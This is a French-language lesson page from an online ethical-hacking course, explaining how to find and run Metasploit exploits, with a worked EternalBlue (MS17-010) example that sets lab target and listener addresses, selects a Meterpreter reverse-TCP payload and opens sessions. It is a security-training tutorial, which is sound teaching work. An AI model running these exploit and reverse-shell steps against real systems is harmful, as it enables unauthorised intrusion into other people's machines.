0Pricing
Ethical Hacking Academy · Leçon

Rechercher et utiliser des exploits

Trouver et exécuter

Rechercher et utiliser des exploits est une leçon Ethical Hacking Academy gratuite sur CoddyKit. Ceci est la leçon 2 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Ethical Hacking Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Ethical Hacking Academy comprend 4 leçons au total.

De la reconnaissance à l’exploitation

Après l’analyse, vous connaissez les services et les versions de la cible. L’étape suivante consiste à trouver un module d’exploitation correspondant à une vulnérabilité connue de ces versions.

La commande search de Metasploit vous donne accès à des milliers de modules. Une recherche précise fait gagner du temps et évite d’exécuter le mauvais code.

Recherche de base

La commande search interroge l’index des modules à l’aide d’un mot-clé. Vous pouvez effectuer une recherche par nom de logiciel, par CVE ou par service.

search eternalblue
search type:exploit platform:windows smb

Filtres de recherche

Affinez les résultats à l’aide de filtres :

  • type: exploit, auxiliary, post.
  • platform: windows, linux, unix.
  • cve: un identifiant CVE précis.
  • rank: excellent, great, good (fiabilité).

La combinaison de filtres réduit rapidement des milliers de modules à une poignée de résultats.

search cve:2017-0144 type:exploit

Lire les résultats de recherche

Les résultats de recherche présentent chaque module avec un rang, une date de divulgation et un indicateur check. Le rang reflète la fiabilité et la sécurité de l’exploit.

  • excellent : risque faible de faire planter la cible.
  • great/good : fiable dans les conditions courantes.
  • low/manual : risqué ou nécessitant une configuration soigneuse.

Privilégiez les modules mieux classés afin d’éviter de faire tomber des systèmes de production.

Chargement d’un module

Utilisez le numéro d’index du module ou son chemin complet avec use. L’invite change pour afficher le module chargé, et le magasin de données contient désormais les options de ce module.

use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >

Inspection du module

Avant de l’exécuter, renseignez-vous sur le module. info affiche la description, les références (CVE, avis de sécurité), les options requises et les cibles prises en charge.

Comprendre ce que fait un module fait partie d’un usage professionnel et responsable : ne lancez jamais un exploit que vous ne comprenez pas.

info
show options
show targets

Configuration des options

Configurez les options requises avec set. Pour un exploit distant, les options courantes sont l’adresse de la cible et les paramètres de votre charge utile.

set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2

La commande check

De nombreux exploits prennent en charge check, qui vérifie en toute sécurité si la cible semble vulnérable sans l’exploiter réellement.

Exécuter check en premier est une bonne pratique : cela réduit le risque de faire tomber un système et confirme que vous êtes sur le point de consacrer des efforts à une véritable opportunité.

check
# [+] 10.10.10.40:445 - The target is vulnerable.

Choix de la charge utile

Un exploit a besoin d’une charge utile. Metasploit en sélectionne une par défaut, mais vous pouvez afficher la liste et en choisir une adaptée à la cible et à vos besoins d’accès.

show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Exécution et sessions

Lancez l’exécution avec exploit (ou run). En cas de réussite, vous obtenez une session, c’est-à-dire une connexion interactive à la cible.

Gérez plusieurs sessions avec sessions -l pour les lister et sessions -i N pour interagir avec l’une d’elles. Mettez une session en arrière-plan avec background pour continuer à travailler dans la console.

exploit
sessions -l
sessions -i 1

Options globales et options du module

Certains paramètres, comme LHOST, sont réutilisés dans de nombreux modules. Définissez-les globalement avec setg pour ne pas avoir à les saisir de nouveau chaque fois que vous changez de module.

  • set : s’applique uniquement au module actuel.
  • setg : s’applique globalement à tous les modules.
  • unsetg : efface une valeur globale.

Cela vous fait gagner du temps lors de longues interventions faisant appel à de nombreux modules.

setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40

Vérification rapide

Choisissez l’étape responsable à effectuer avant de lancer un exploit.

Récapitulatif

Vous avez appris à trouver et à exécuter des exploits :

  • Utiliser search avec des filtres (type, plateforme, cve, rang) pour trouver des modules.
  • Privilégier les modules de rank élevé pour gagner en fiabilité et en sécurité.
  • Utiliser use pour charger, info/show options pour inspecter et set pour configurer.
  • Exécuter d’abord check, puis exploit pour obtenir une session.
  • Gérer les sessions avec sessions -l/-i.

Ensuite : les charges utiles et l’interpréteur post-exploitation Meterpreter.

Questions Fréquemment Posées

La leçon « Rechercher et utiliser des exploits » est-elle gratuite ?

Oui — le texte complet de « Rechercher et utiliser des exploits » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Ethical Hacking Academy, passe à CoddyKit PRO. Le cours Ethical Hacking Academy comprend 4 leçons au total.

Qu'est-ce que j'apprendrai dans « Rechercher et utiliser des exploits » ?

Trouver et exécuter Tu pratiques Ethical Hacking Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.

Dois-je avoir de l'expérience pour commencer Ethical Hacking Academy ?

Aucune expérience préalable n'est requise. Ethical Hacking Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 2 sur 4.

Combien de temps prend la leçon « Rechercher et utiliser des exploits » ?

La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.

Peux-tu écrire et exécuter du code dans cette leçon Ethical Hacking Academy ?

Oui. Chaque leçon Ethical Hacking Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.

Toutes les leçons de ce cours

  1. Architecture de Metasploit
  2. Rechercher et utiliser des exploits
  3. Charges utiles et Meterpreter
  4. Modules post-exploitation
← Retour à Ethical Hacking Academy